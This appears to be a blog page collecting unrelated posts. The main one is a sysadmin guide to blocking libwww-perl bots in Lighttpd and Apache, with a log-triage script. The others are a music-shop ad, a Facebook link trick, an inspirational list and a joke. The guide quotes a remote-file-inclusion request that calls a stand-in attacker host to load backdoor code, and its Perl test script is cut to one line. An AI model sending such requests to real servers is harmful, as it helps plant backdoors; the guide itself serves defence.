The rise of bots, spammers, crack attacks and libwww-perl


libwww-perl (LWP) is a fine WWW client/server library for Perl. Unfortunately, this library is also used by many script kiddies, crackers, and spam bots.

Verify bots…

The following is a typical example that you will find in your Apache or lighttpd access.log file:

$ grep 'libwww-perl' access.log

OR

$ grep 'libwww-perl' /var/log/lighttpd/access.log

Output:

62.152.64.210 www.domain.com - [23/Oct/2006:22:24:37 +0000] "GET /wamp_dir/setup/yesno.phtml?no_url=http://www.someattackersite.com/list.txt? HTTP/1.1" 200 72672 "-" "libwww-perl/5.76"

So someone is trying to attack your host and exploit a security hole to install a backdoor. yesno.phtml is a poorly written application that can run or include PHP code (list.txt) from a remote server. This code installs a Perl-based backdoor in /tmp or /dev/shm and sends a notification to an IRC server or bot master, i.e. the server is ready to be used for attacks against other computers. This backdoor can flood or DDoS other victims' servers (it will also cost you tons of bandwidth). Usually the attacker hides behind zombie machines. Blocking by user agent can help, and in some cases the problem can be dropped altogether.

You will also notice libwww-perl/5.76 as the browser name (read as user agent). To avoid such attacks:
=> Block all libwww-perl useragent
=> Run web server in chrooted jail

How to block libwww-perl under Lighttpd web server?

Open the lighttpd.conf file:
# vi /etc/lighttpd/lighttpd.conf
Append the following lines to the main server or virtual hosting section:
$HTTP["useragent"] =~ "libwww-perl" {
    url.access-deny = ( "" )
}

Save and close the file. Restart lighttpd:
# /etc/init.d/lighttpd restart

How to block libwww-perl under Apache web server?

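Use mod_setenvif and an .htaccess file to block the user agent libwww-perl. Open your .htaccess file and add the rules as follows:
# Tag any request whose User-Agent starts with libwww-perl (case-insensitive)
SetEnvIfNoCase User-Agent "^libwww-perl" block_bad_bots
# Refuse every request that carries the tag
Deny from env=block_bad_bots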

How do I verify that User-Agent libwww-perl is blocked?

Download this Perl script to your own workstation. Replace http://your-website.com/ with your site name:
$req = HTTP::Request->new(GET => 'http://your-website.com/');
Save and execute the Perl script:
$ chmod +x test-lwp.pl
$ ./test-lwp.pl

Output:

Error: 403 Forbidden

You should see a 403 Forbidden error, as your user agent is blocked by the server configuration.

Please note that blocking by user agent can help, but spammers spoof user agents. My personal experience shows that blocking libwww-perl saves bandwidth and drops potential threats by 50-80%.
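As an added example (not part of the original article), the following Python code triages access-log lines for the pattern in the request shown earlier, a query parameter whose value is a remote URL, independently of the User-Agent, and records whether each such request was served (2xx) or refused. It assumes the log layout of the sample line; apart from that line, the sample entries and the names `triage` and `remote_include_params` are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Assumed layout: client, vhost-or-ident, user, [time], "request", status, bytes, "referer", "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$'
)
REMOTE_VALUE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# First entry is the request quoted in the article; the others are constructed.
SAMPLE_LOG = [
    '62.152.64.210 www.domain.com - [23/Oct/2006:22:24:37 +0000] "GET /wamp_dir/setup/'
    'yesno.phtml?no_url=http://www.someattackersite.com/list.txt? HTTP/1.1" '
    '200 72672 "-" "libwww-perl/5.76"',
    '192.0.2.10 www.domain.com - [24/Oct/2006:01:02:03 +0000] "GET /wamp_dir/setup/'
    'yesno.phtml?no_url=http://files.example.net/list.txt? HTTP/1.1" '
    '403 345 "-" "libwww-perl/5.76"',
    '192.0.2.11 www.domain.com - [24/Oct/2006:01:05:09 +0000] "GET /wamp_dir/setup/'
    'yesno.phtml?no_url=http%3A%2F%2Ffiles.example.net%2Flist.txt HTTP/1.1" '
    '200 72672 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.0.2.12 www.domain.com - [24/Oct/2006:01:06:00 +0000] "GET /index.html?page=2 '
    'HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

def remote_include_params(target):
    """Names of query parameters whose (percent-decoded) value is a URL."""
    query = target.partition('?')[2]
    return [name for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_VALUE.match(value)]

def triage(lines):
    """One finding per request that passes a remote URL as a parameter."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not in the assumed layout
        params = remote_include_params(m['target'])
        if params:
            findings.append({
                'ip': m['ip'], 'params': params, 'agent': m['agent'],
                'served': m['status'].startswith('2'),  # 2xx: not blocked
                'lwp': 'libwww-perl' in m['agent'].lower(),
            })
    return findings

if __name__ == '__main__':
    print(*triage(SAMPLE_LOG), sep='\n')
```

A finding with `served` true and `lwp` false is a request that the user-agent rule did not stop, which is the case to review first.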

Another highly recommended solution is to run the web server in a chrooted jail. In a chrooted jail, an attacker cannot install the backdoor, as a shell and utilities such as wget are not available to download the Perl code. I also recommend blocking all outgoing HTTP/FTP requests from your web server using iptables, or using a hardware-based firewall such as Cisco ASA firewalls.

A final, extreme solution is to put the entire root file system on read-only media such as a CD-ROM (or use a live CD). No attacker can bring down your web server if it is serving pages from read-only media (except by a DoS/DDoS attack).

What do you think? How do you block such attacks? Please share your nifty techniques with us.

 

[Source: http://www.cyberciti.biz]

Muzikal India – That sells Musical Instruments online

MuzikalIndia is an e-commerce web portal that runs on both personal computers and handheld devices. Our product sells musical instruments to customers online. We aim to help low-capitalized musical stores create an online presence. Our targeted customers are students, musicians/bands/orchestras, music schools, etc.
Most of the online musical stores in India are owned by highly capitalized stores. These stores cater only to some of the metro cities like Bangalore, Chennai and Mumbai. Low-capitalized musical stores are lagging behind in online presence. To solve these problems, we came up with a solution called muzikalindia.com. This helps small musical stores present their musical instruments on our portal. Customers also benefit: they get multiple options of stores and products before choosing a product, thus saving time on purchase and research.

Muzikal India also promises to provide tutors for beginners to start their campaign. It has its own blog, blog.muzikalindia.com, which helps users learn instruments online. The blog also provides various information regarding musical instruments, news, events, etc.

Buy Musical instruments online from http://muzikalindia.com

Regards
Team MuzikalIndia

Post a hyperlink on Facebook Wall Post


Hello friends, after spending an hour searching on this topic, I finally found a way to add hyperlinks to our Facebook status. Check it out.

Method 1. Copy and paste the code below into your Facebook wall post. Replace the text “Click here to view the ugliest profile ever” with your own.

@[1: ]@@[1:[0:1: Click here to view the ugliest profile ever! ]]

Method 2. Modify the code below as follows.

PROFILE_ID: Your profile ID, e.g. 100002925714087 in my case

CUSTOM_TEXT: Text you want to make visible

@@[0:[PROFILE_ID:1:CUSTOM_TEXT]]
@[PROFILE_ID:0]

Thanks

Dev

[Source: http://www.doncaprio.com/2011/11/embed-custom-link-facebook-status.html]


1 MIN reading: I have learned


(This text, which I found on the Internet, is attributed to me. I did not write it, but I think it is worth reproducing here.)

I’ve learned that you cannot make someone love you. All you can do is be someone who can be loved. The rest is up to them;
I’ve learned that no matter how much I care, some people just don’t care back;
I’ve learned that it takes years to build up trust, and only seconds to destroy it.
I’ve learned that you can get by on charm, for about fifteen minutes. After that, you’d better know something;
I’ve learned that either you control your attitude or it controls you.
I’ve learned that no matter how hot and steamy a relationship is at first, the passion fades and there had better be something else to take its place.
I’ve learned that sometimes the people you expect to kick you when you’re downhill are the ones to help you get back up.
I’ve learned that sometimes when I’m angry I have the right to be angry.
I’ve learned that true friendship continues to grow, even over the longest distance. Same goes for true love.
I’ve learned that just because someone doesn’t love you the way you want them to doesn’t mean that they don’t love you with all they have.
I’ve learned that maturity had more to do with what types of experiences you’ve had and what you’ve learned from them and less to do with how many birthdays you’ve celebrated.
I’ve learned that your family won’t always be there for you.
I’ve learned that no matter how good a friend is, they’re going to hurt you every once in a while.
I’ve learned that it isn’t always enough to be forgiven by others. Sometimes you have to forgive yourself.
I’ve learned that no matter how bad your heart is broken, the world doesn’t stop for your grief.
I’ve learned that our background and circumstances may have influenced who we are, but we are responsible for who we become.
I’ve learned that just because two people argue, it doesn’t mean they don’t love each other. And just because they don’t argue, it doesn’t mean they do.
I’ve learned that we don’t have to change friends if we understand that friends change.
I’ve learned that two people can look at the exact same thing and see something totally different.
I’ve learned that no matter how you try to protect your children, they will eventually get hurt and you will get hurt in the process.
I’ve learned that your life can be changed in a matter of hours by people who don’t even know you.
I’ve learned that it’s hard to determine where to draw the line between being nice and not hurting people’s feelings and standing up for what you believe.


The Truth About Man


One day in the Garden of Eden, Eve calls out to God. “Lord, I have a problem!” “What’s the problem, Eve?” “Lord, I know you created me and provided this beautiful garden and all of these wonderful animals and that hilarious comedic snake, but I’m just not happy.” “Why is that, Eve?” came the reply from above. “Lord, I am lonely, and I’m sick to death of apples.” “Well Eve, in that case, I have a solution. I shall create a man for you.” “What’s a man, Lord?”

“This man will be a flawed creature, with many bad traits. He’ll lie, cheat, and be vainglorious; all in all, he’ll give you a hard time. But… he’ll be bigger, faster, and will like to hunt and kill things. He will look silly when he’s aroused, but since you’ve been complaining, I’ll create him in such a way that he will satisfy your physical needs. He will be witless and will revel in childish things like fighting and kicking a ball about.”

“He won’t be too smart, so he’ll also need your advice to think properly.”

“Sounds great,” says Eve, with an ironically raised eyebrow. “What’s the catch, Lord?” “Well, you can have him on one condition.” “What’s that, Lord?” “As I said, he’ll be proud, arrogant, and self-admiring… So you’ll have to let him believe that I made him first. But remember, it’s our little secret… You know, woman to woman.”
